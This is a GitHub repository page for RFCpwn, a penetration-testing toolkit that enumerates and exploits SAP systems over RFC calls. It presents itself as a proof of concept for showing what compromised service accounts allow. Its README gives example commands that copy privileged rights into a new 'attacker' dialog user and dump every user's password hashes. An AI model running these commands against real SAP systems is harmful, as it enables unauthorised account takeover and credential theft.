Skip to content
GitHub no longer supports this web browser. Learn more about the browsers we support.
An enumeration and exploitation toolkit using RFC calls to SAP
Python
Branch: master
Clone or download
Cannot retrieve the latest commit at this time.
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore Initial commit Dec 31, 2019
LICENSE Initial commit Dec 31, 2019
README.md
RFCpwn.py

README.md

RFCpwn

An SAP enumeration and exploitation toolkit using SAP RFC calls

Twitter: @icryo

This is a toolkit for demonstrating the impact of compromised service accounts.

This PoC is not for use in production environments, no guarantee of stability or support.

RFCpwn relies on the pyrfc and the libraries provided by SAP in: https://github.com/SAP/PyRFC#installation

usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
                   [-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
                   [-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]

An Impacket style enumeration and exploitation tool using SAP RFC calls

optional arguments:
  -h, --help   show this help message and exit
  -debug       Turn DEBUG output ON

Authentication:
  -ip IP       <targetName or address>
  -u Username  RFC Users Username
  -p Password  RFC Users Password
  -c Client    Client- eg.000
  -s Sysid     System Number- eg 00
  -ping        RFC Ping Command

User Abuse:
  -enum        Use to enumerate a specific user
  -usercopy    add a Dialog User
  -user USER   Required for -usercopy and -userenum to specify the user
  -copy COPY   User to be copied required for -usercopy
  -pw PW       password of new user for -usercopy

Hash Collection:
  -dump        Dump hashes use with below
  -exp         EXPERIMENTAL - Dump BCODE / PASSCODE hashes

Examples

Ping - confirm connectivity

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping

Copy a users rights into a new dialog user. If -copy is not specified SAP* is used.

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1

Dump hashes from all users. option -exp for experimental bcode & passcode hashes.

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump 

Demo

Imgur Image

You can’t perform that action at this time.